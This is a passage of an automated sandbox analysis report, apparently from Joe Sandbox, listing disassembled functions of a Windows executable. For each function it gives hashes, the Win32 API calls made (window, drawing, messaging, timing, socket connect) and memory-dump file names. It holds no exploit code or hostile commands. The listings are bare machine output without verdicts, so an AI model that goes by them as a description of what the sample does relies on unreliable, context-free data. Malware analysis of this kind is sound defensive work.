          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
          APIs
          • GetWindowRect.USER32(?,?), ref: 00436A24
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: RectWindow
          • String ID:
          • API String ID: 861336768-0
          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
          APIs
          • SendMessageW.USER32 ref: 00449598
            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
          • _wcslen.LIBCMT ref: 0044960D
          • _wcslen.LIBCMT ref: 0044961A
          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$_wcslen$_wcspbrk
          • String ID:
          • API String ID: 1856069659-0
          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
          APIs
          • GetCursorPos.USER32(?), ref: 004478E2
          • TrackPopupMenuEx.USER32 ref: 004478FC
          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
          • GetCursorPos.USER32(00000000), ref: 0044796A
          • TrackPopupMenuEx.USER32 ref: 00447991
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CursorMenuPopupTrack$Proc
          • String ID:
          • API String ID: 1300944170-0
          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Client$CursorFromPointProcRectScreenWindow
          • String ID:
          • API String ID: 1822080540-0
          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
          APIs
          • GetWindowRect.USER32(?,?), ref: 00447C5D
          • ScreenToClient.USER32(?,?), ref: 00447C7B
          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
          • EndPaint.USER32(?,?), ref: 00447D13
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ClientPaintRectRectangleScreenViewportWindow
          • String ID:
          • API String ID: 659298297-0
          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
          APIs
          • EnableWindow.USER32(?,00000000), ref: 00448B5C
          • EnableWindow.USER32(?,00000001), ref: 00448B72
          • ShowWindow.USER32(?,00000000), ref: 00448BE8
          • ShowWindow.USER32(?,00000004), ref: 00448BF4
          • EnableWindow.USER32(?,00000001), ref: 00448C09
            • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
            • Part of subcall function 00440D98: SendMessageW.USER32(024CDD58,000000F1,00000000,00000000), ref: 00440E6E
            • Part of subcall function 00440D98: SendMessageW.USER32(024CDD58,000000F1,00000001,00000000), ref: 00440E9A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$EnableMessageSend$LongShow
          • String ID:
          • API String ID: 142311417-0
          • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
          • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
          • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
          • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
          APIs
          • IsWindowVisible.USER32(?), ref: 00445879
          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
          • _wcslen.LIBCMT ref: 004458FB
          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
          • String ID:
          • API String ID: 3087257052-0
          • Opcode ID: 086c895d075b6e22dfe9b9bf7c6d8989a42d21f9f1d80187c592a8b5fcd2512e
          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
          • Opcode Fuzzy Hash: 086c895d075b6e22dfe9b9bf7c6d8989a42d21f9f1d80187c592a8b5fcd2512e
          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
          APIs
          • IsWindow.USER32(00000000), ref: 00459F13
          • GetForegroundWindow.USER32 ref: 00459F2B
          • GetDC.USER32(00000000), ref: 00459F68
          • GetPixel.GDI32(00000000,?,00000003), ref: 00459F73
          • ReleaseDC.USER32(00000000,00000000), ref: 00459FAF
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$ForegroundPixelRelease
          • String ID:
          • API String ID: 4156661090-0
          • Opcode ID: 5afad29d2f6628ba852ec2f0e1202929834638e908bc6ef215a28b5977bea177
          • Instruction ID: 6b7338dff4dfdecd0952657b1ab2c92c8f9a91c38a36cf82f76c1914ab5c2144
          • Opcode Fuzzy Hash: 5afad29d2f6628ba852ec2f0e1202929834638e908bc6ef215a28b5977bea177
          • Instruction Fuzzy Hash: 22215076A00101ABD714EFA5CD89A5EF7A9FF88311F14856AED0997742DB74EC00CB94
          APIs
            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
          • closesocket.WSOCK32(00000000,00000000), ref: 00465481
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorLast$closesocketconnectinet_addrsocket
          • String ID:
          • API String ID: 245547762-0
          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
          APIs
          • DeleteObject.GDI32(00000000), ref: 004471D8
          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
          • SelectObject.GDI32(?,00000000), ref: 00447228
          • BeginPath.GDI32(?), ref: 0044723D
          • SelectObject.GDI32(?,00000000), ref: 00447266
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Object$Select$BeginCreateDeletePath
          • String ID:
          • API String ID: 2338827641-0
          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
          APIs
          • Sleep.KERNEL32(00000000), ref: 00434598
          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
          • Sleep.KERNEL32(00000000), ref: 004345D4
          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CounterPerformanceQuerySleep
          • String ID:
          • API String ID: 2875609808-0
          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: BeepDialogItemKillMessageTextTimerWindow
          • String ID:
          • API String ID: 3741023627-0
          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Destroy$DeleteObjectWindow$Icon
          • String ID:
          • API String ID: 4023252218-0
          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: DeleteDestroyObject$IconMessageSendWindow
          • String ID:
          • API String ID: 1489400265-0
          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
          APIs
            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
          • DestroyWindow.USER32 ref: 00455728
          • DeleteObject.GDI32(?), ref: 00455736
          • DeleteObject.GDI32(?), ref: 00455744
          • DestroyIcon.USER32(?), ref: 00455752
          • DestroyWindow.USER32 ref: 00455760
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
          • String ID:
          • API String ID: 1042038666-0
          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Path$ObjectStroke$DeleteFillSelect
          • String ID:
          • API String ID: 2625713937-0
          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
